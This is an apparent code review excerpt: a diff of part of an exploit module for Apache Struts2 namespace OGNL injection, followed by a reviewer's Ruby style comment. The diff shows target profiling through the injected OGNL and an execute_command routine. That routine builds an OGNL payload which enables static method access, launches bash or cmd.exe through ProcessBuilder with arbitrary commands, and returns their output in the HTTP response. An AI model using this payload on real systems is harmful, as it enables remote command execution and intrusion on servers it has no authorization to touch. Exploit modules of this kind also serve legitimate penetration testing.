modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+      # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'
+      #   Extract the OGNL output from the Location path, and strip the two random chars
+      s = r.headers['Location'].split('/')[1][2..-1]
+
+      # Confirm that all fields were returned, and non include extra (:) delimiters
+      #   If the OGNL fails, we might get a partial result back, in which case, we'll abort.
+      if s.count(':') > properties.length
+        print_error("Failed to profile target.  Response from server: #{r.to_s}")
+        fail_with(Failure::UnexpectedReply,"Target responded with unexpected profiling data")
+      end
+      
+      # Separate the colon-delimited properties and store in the 'properties' hash
+      s = s.split(':')
+      i = 0
+      properties.each do |k,v|
+        properties[k] = s[i]
+        i += 1
+      end
+
+      print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
+        " #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
+      return properties
+    else
+      print_error("Failed to profile target.  Response from server: #{r.to_s}")
+      fail_with(Failure::UnexpectedReply, 'Server did not respond properly to profiling attempt.')
+    end
+  end
+
+  def execute_command(cmd_input, opts={})    # WTF is opts for?
+    # Semicolons appear to be a bad character in OGNL.  cmdstager doesn't understand that.
+    #   We'll replace ';' with '||' and hope for the best
+
+    if (cmd_input.include?';')
+      print_error("WARNING: Command contains bad characters: semicolons (;).  Substituting '||'")
+      vprint_status("BEFORE: #{cmd_input}")
+      cmd_input = cmd_input.gsub(";" ,"||")
+      vprint_status("AFTER: #{cmd_input}")
+    end
+
+    properties = profile_target
+    
+    os = properties[:'os.name'].downcase
+    if os.include?'linux' or os.include?'nix'
+      cmd = "{'bash','-c','#{cmd_input}'}"
+    elsif os.include?'win'
+      cmd = "{'cmd.exe','/c','#{cmd_input}'}"
+    else
+      vprint_error("Failed to detect target OS.  Attempting to execute command directly")
+      cmd = cmd_input
+    end
+
+    # The following OGNL will run arbitrary commands on Windows and Linux
+    #   targets, as well as returning STDOUT and STDERR.  In my testing,
+    #   on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.
+
+    vprint_status("Executing: #{cmd}")
+
+    ognl = "(#_memberAccess['allowStaticMethodAccess']=true)."
+    ognl << "(#p=new java.lang.ProcessBuilder(#{cmd}))."
+    ognl << "(#p.redirectErrorStream(true))."
+    ognl << "(#process=#p.start())."
+    ognl << "(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))."
+    ognl << "(#r.flush())"
+
+    r = send_struts_request(ognl)
+
+    if r && r.code == 200
+      print_good("Command executed:\n#{r.body}")
+    else
```

Comment:
You're not nested here, but this may be desirable in the future: https://github.com/rubocop-hq/ruby-style-guide#no-nested-conditionals.